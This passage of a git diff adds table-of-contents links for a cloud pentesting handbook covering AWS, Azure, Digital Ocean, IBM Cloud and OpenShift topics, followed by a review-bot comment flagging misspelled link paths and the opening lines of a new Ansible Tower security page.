EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) + * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md) + * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) + * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) + * [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md) + * [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md) + * [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) + * [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md) + * [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md) + * [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md) + * [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) + * [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md) + * [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md) + * [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md) + * [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md) + * [AWS - Secrets Manager Post 
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md) + * [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md) + * [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md) + * [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md) + * [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) + * [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md) + * [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md) + * [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) + * [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) + * [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) + * [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) + * [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) + * [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) + * [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md) + * [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md) + * [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md) + * [AWS - 
Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md) + * [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) + * [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md) + * [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md) + * [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md) + * [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md) + * [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md) + * [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md) + * [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md) + * [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md) + * [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md) + * [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) + * [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md) + * [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md) + * [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md) + * [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md) + * [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md) + * [AWS - KMS 
Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md) + * [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) + * [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md) + * [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md) + * [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md) + * [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md) + * [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md) + * [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md) + * [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) + * [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md) + * [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md) + * [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) + * [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md) + * [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md) + * [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md) + * [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md) + * [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md) + * [AWS - Step Functions 
Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md) + * [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md) + * [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md) + * [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md) + * [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md) + * [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md) + * [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md) + * [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md) + * [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) + * [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md) + * [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md) + * [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md) + * [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) + * [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md) + * [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md) + * [AWS - Security Hub Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md) + * [AWS - Shield 
Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md) + * [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md) + * [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md) + * [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md) + * [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md) + * [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md) + * [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md) + * [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md) + * [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md) + * [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md) + * [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md) + * [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md) + * [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) + * [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md) + * [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md) + * [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md) + * [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md) + * [AWS - 
Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md) + * [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md) + * [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md) + * [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md) + * [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md) + * [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md) + * [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md) + * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md) + * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md) + * [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md) + * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md) + * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md) + * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md) + * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md) + * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md) + * [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md) + * [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md) + * [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md) + * [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) + * [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) + * [AWS - Route53 
Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) + * [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) + * [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) + * [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) + * [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md) + * [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md) + * [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md) + * [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md) + * [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md) + * [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md) + * [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md) + * [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) + * [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) + * [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) + * [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) + * [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md) + * [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) + * [AWS - EC2 Unauthenticated 
Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) + * [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) + * [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) + * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) + * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md) + * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) + * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) + * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md) + * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md) + * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) + * [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md) + * [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) + * [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) + * [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) + * [AWS - Redshift Unauthenticated 
Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md) + * [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) + * [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) + * [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) +* [Azure Pentesting](pentesting-cloud/azure-security/README.md) + * [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md) + * [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md) + * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) + * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) + * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) + * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) + * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) + * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) + * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) + * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md) + * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) + * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) + * [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) + * [Az 
- Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md) + * [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md) + * [Az - Azure App Service & Function Apps](pentesting-cloud/azure-security/az-services/az-azure-app-service.md) + * [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) + * [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) + * [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md) + * [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md) + * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) + * [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md) + * [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md) + * [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md) + * [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md) + * [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md) + * [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md) + * [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md) + * [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md) + * [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md) + * [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) + * [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) + * [Az 
- Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) + * [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) + * [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) + * [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) + * [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) + * [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) + * [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) + * [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) + * [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) + * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) + * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) + * [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) + * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) + * [Az - Primary Refresh Token 
(PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) + * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) + * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) + * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) + * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) + * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) + * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) + * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) + * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) + * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) + * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) + * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) + * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) + * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) + * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) + * [Az - Service 
Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) + * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) + * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) + * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) + * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) + * [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) + * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) + * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) +* [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) + * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) + * [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) + * [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) + * [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) + * [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) + * [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) + * [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) + * [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) + * [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) + * [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) + * [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) + * [DO - 
Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) + * [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) + * [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) +* [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) + * [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) + * [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) + * [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) +* [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) + * [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) + * [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) + * [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) + * [OpenShift - Jenkins Build Pod Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md) + * [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md) + * [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md) + * [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md) + * [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md) + +## 🛫 Pentesting Network Services + +* [HackTricks Pentesting Network](https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network) +* [HackTricks Pentesting Services](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh) 
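Review bot: several link targets in this SUMMARY.md hunk do not match their link text or the naming pattern of their sibling entries, which usually indicates a misspelled or stale path: `[AWS - Organizations Privesc](.../aws-organizations-prinvesc.md)` (prinvesc), `[Az - Queue Storage Persistence](.../az-queue-persistance.md)` (persistance), and `[AWS - SQS Enum](.../aws-sqs-and-sns-enum.md)` while SNS already has its own `aws-sns-enum.md` entry directly above it. Please confirm each target file exists under exactly that name before merging, since a mistyped path leaves a dead entry in the table of contents. Two text nits in the same hunk: `[Az - VMs Unath]` should read `Unauth`, and the OpenShift entries mix `OpenShift - Basic information` with `Openshift - SCC`.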
diff --git a/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md new file mode 100644 index 0000000000..8098117c1d --- /dev/null +++ b/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md @@ -0,0 +1,167 @@ +# Ansible Tower / AWX / Automation controller Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
